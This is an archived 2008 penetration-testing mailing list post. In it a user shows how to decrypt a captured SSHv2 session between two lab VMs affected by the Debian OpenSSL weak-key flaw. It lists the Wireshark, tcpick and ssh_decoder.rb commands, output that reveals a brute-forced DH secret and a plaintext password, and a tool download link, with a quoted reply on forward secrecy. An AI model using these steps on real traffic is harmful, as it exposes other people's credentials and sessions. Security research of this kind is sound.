Penetration Testing mailing list archives
Re: How to decrypt a connection SSH v2?
From: Ulises2k <ulises2k () gmail com>
Date: Thu, 10 Jul 2008 17:38:07 -0300
Hi. I do. Thank very much at Raphaël Rigo, development ssh_decoder.[0] I have 2 Virtual Machines, 1 ubuntu 8.04 server (no updated) and 1 ubuntu 8.04 client (no updated). VM have vulnerability libssl discovery by Luciano Bello on May-2008. Client TTY 1: $ sudo wireshark In other terminal (TTY2) exec: $ssh 192.168.230.143 user@192.168.230.143's password: Last login: Wed Jul 9 17:10:04 2008 from 192.168.230.144 user@ubuntu804server:~$ echo "este es un comando tirado en el server" user@ubuntu804server:~$ exit Client TTY1: $Stop sniffing Wireshark. Save file "sshv2.cap" $ tcpick -wRC -wRS -r sshv2.cap Starting tcpick 0.2.1 at 2008-07-10 14:14 EDT Timeout for connections is 600 tcpick: reading from sshv2.cap 1 SYN-SENT 192.168.230.144:44550 > 192.168.230.143:ssh 1 SYN-RECEIVED 192.168.230.144:44550 > 192.168.230.143:ssh 1 ESTABLISHED 192.168.230.144:44550 > 192.168.230.143:ssh 1 FIN-WAIT-1 192.168.230.144:44550 > 192.168.230.143:ssh 1 TIME-WAIT 192.168.230.144:44550 > 192.168.230.143:ssh 1 CLOSED 192.168.230.144:44550 > 192.168.230.143:ssh tcpick: done reading from sshv2.cap 81 packets captured 1 tcp sessions detected $ ruby ssh_decoder.rb tcpick* * read handshake cipher: aes128-cbc, mac: hmac-md5, kex_hash: sha256, compr: none * bruteforce DH DH shared secret : 63368d70f36fca060daa9d83b67f68bdd3cd9a4a150b27bfa51689f091b5d8857eb3b93057430be1577e45bb742b4528dca889cbda21de1ab2ec0ba1e364b421aa2797c1ad4667a66c7b20317842b5c509160a38629ae551e128b64e4af73d5ce7331342d8d9bd6128c3c89e0d2a55b6c4c5b7da06eead4dee4e3eb5d01d1210 * derive keys * decipher streams * successful authentication packet {:username=>"user", :nextservice=>"ssh-connection", :auth_method=>"password", :change=>0, :password=>"superpassword"} * deciphered streams saved to "sshdecrypt.0.client.dat" & "sshdecrypt.0.server.dat" User: User Password: superpassword In sshdecrypt.0.client.dat and sshdecrypt.0.server.dat all text plane.(user/password/command) The script (ssh_decoder and ssh_kex_keygen ) generate private key. Dowload ssh_decoder and ssh_kex_keygen [0] [0]http://www.cr0.org/progs/sshfun/ Thank you very much. -- Ulises U. Cuñé Web: http://www.ulises2k.com.ar On Thu, Jul 10, 2008 at 14:25, Gary E. Miller <gem () rellim com> wrote:
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Yo Paul! On Thu, 10 Jul 2008, Paul Melson wrote:I assume if the attacker has the public and private keys from not just one, but both ends, that PFS is not an obstacle.It's my understanding that even if you have both endpoints' public and private key pairs, that's not enough to recreate the ephemeral keys used during a particular session. Without those keys, the packet capture cannot be decrypted.Read the RFC and tell me that again: http://tools.ietf.org/html/rfc4253#section-8 "The Diffie-Hellman (DH) key exchange provides a shared secret that cannot be determined by either party alone. " ^^^^^^^^^^^^^^^^^^^^^^ The whole point if the key exchange is to use both sets of public/private keys to generate this shared secret, and only those 4 keys. If you possess those 4 keys then game over, you can decode the shared key. Looks to me that the RFC tells you all you need to know to recover the shared secret. If someone had some time on their hands they could probably grab most of the needed code out of the openssh code. RGDS GARY - --------------------------------------------------------------------------- Gary E. Miller Rellim 109 NW Wilmington Ave., Suite E, Bend, OR 97701 gem () rellim com Tel:+1(541)382-8588 -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.3 (GNU/Linux) iD8DBQFIdkX/8KZibdeR3qURAqX2AJoDno9k9Onk6W5ZpGbMF1eCxKBGBwCZAYA2 bDDCaensdMGUAl9j+ZaWz7o= =CXfX -----END PGP SIGNATURE-----
------------------------------------------------------------------------ This list is sponsored by: Cenzic Top 5 Common Mistakes in Securing Web Applications Get 45 Min Video and PPT Slides www.cenzic.com/landing/securityfocus/hackinar ------------------------------------------------------------------------
Current thread:
- How to decrypt a connection SSH v2? Ulises2k (Jul 09)
- Re: How to decrypt a connection SSH v2? Paul Melson (Jul 09)
- Re: How to decrypt a connection SSH v2? Ulises2k (Jul 10)
- Re: How to decrypt a connection SSH v2? Tim (Jul 10)
- Re: How to decrypt a connection SSH v2? Jimmy Brokaw (Jul 12)
- Re: How to decrypt a connection SSH v2? Ulises2k (Jul 10)
- Re: How to decrypt a connection SSH v2? Gary E. Miller (Jul 10)
- RE: How to decrypt a connection SSH v2? Paul Melson (Jul 10)
- RE: How to decrypt a connection SSH v2? Gary E. Miller (Jul 10)
- Re: How to decrypt a connection SSH v2? Ulises2k (Jul 10)
- Re: How to decrypt a connection SSH v2? Paul Melson (Jul 09)
- Re: How to decrypt a connection SSH v2? Tim (Jul 10)
- <Possible follow-ups>
- RE: How to decrypt a connection SSH v2? Gary E. Miller (Jul 10)
- Message not available
- Re: How to decrypt a connection SSH v2? Ulises2k (Jul 13)
- Message not available